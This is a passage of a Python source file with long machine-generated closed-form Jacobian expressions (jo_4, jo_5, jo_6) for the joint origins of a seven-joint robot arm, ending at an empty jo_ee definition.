    return np.array([[(-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]), -(-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), 0, 0, 0, 0], [(-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), -(-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]), (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), 0, 0, 0, 0], [0, 0.069*s(q[1, 0])*c(q[2, 0]) - 0.36435*c(q[1, 0]), 0.069*s(q[2, 0])*c(q[1, 0]), 0, 0, 0, 0]])
def jo_4(q):
    """Return the 3x7 Jacobian of joint-origin 4.

    Depends on the first four joint angles (q[0, 0]..q[3, 0]); columns 4-6
    are zero.  q is indexed as a column vector (q[i, 0]); assumed 7x1 --
    TODO confirm against callers.  The closed form looks machine-generated
    (presumably exported from a CAS) and is kept verbatim -- restructuring
    it by hand risks silent numeric corruption.
    """
    return np.array([[(0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) + 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]), (-0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[3, 0]) - (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), (-0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), 0, 0, 0], [(0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 
0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), -(-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) - (-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]), (0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0]) + (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), (-0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), 0, 0, 0], [0, 0.37429*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) + 0.069*s(q[1, 0])*c(q[2, 0]) - 0.37429*c(q[1, 0])*c(q[3, 0]) - 0.36435*c(q[1, 0]), 0.37429*s(q[2, 0])*s(q[3, 0])*c(q[1, 0]) + 0.069*s(q[2, 0])*c(q[1, 0]), 0.37429*s(q[1, 0])*s(q[3, 0]) - 0.37429*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]), 0, 0, 0]])
def jo_5(q):
return np.array([[(0.01*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) + 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), (-0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]), 0.01*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 
0]))*s(q[1, 0])*s(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) - (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), (-0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (-0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), -(0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), 0, 0], [(0.01*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 
(0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), (-0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) - (-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]), (0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0]) + 0.01*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) + (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), 
(-0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), -(0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), 0, 0], [0, (0.01*s(q[1, 0])*c(q[2, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) - 0.01*s(q[1, 0])*s(q[2, 0])*s(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) + 0.069*s(q[1, 0])*c(q[2, 0]) - 0.37429*c(q[1, 0])*c(q[3, 0]) - 0.36435*c(q[1, 0]), 0.37429*s(q[2, 0])*s(q[3, 0])*c(q[1, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[3, 0])*c(q[4, 0]) + 0.069*s(q[2, 0])*c(q[1, 0]) + 0.01*s(q[4, 0])*c(q[1, 0])*c(q[2, 0]), (0.01*s(q[1, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*c(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0]) - 0.37429*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]), -(0.01*s(q[1, 0])*s(q[3, 0]) - 0.01*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*s(q[4, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[4, 0]), 0, 0]])
def jo_6(q):
return np.array([[(0.01*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) + 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), (-0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]), 0.01*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 
0]))*s(q[1, 0])*s(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) - (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), (-0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (-0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), -(0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), 0, 0], [(0.01*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 
(0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), (-0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) - (-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]), (0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0]) + 0.01*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) + (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), 
(-0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), -(0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), 0, 0], [0, (0.01*s(q[1, 0])*c(q[2, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) - 0.01*s(q[1, 0])*s(q[2, 0])*s(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) + 0.069*s(q[1, 0])*c(q[2, 0]) - 0.37429*c(q[1, 0])*c(q[3, 0]) - 0.36435*c(q[1, 0]), 0.37429*s(q[2, 0])*s(q[3, 0])*c(q[1, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[3, 0])*c(q[4, 0]) + 0.069*s(q[2, 0])*c(q[1, 0]) + 0.01*s(q[4, 0])*c(q[1, 0])*c(q[2, 0]), (0.01*s(q[1, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*c(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0]) - 0.37429*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]), -(0.01*s(q[1, 0])*s(q[3, 0]) - 0.01*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*s(q[4, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[4, 0]), 0, 0]])
def jo_ee(q):
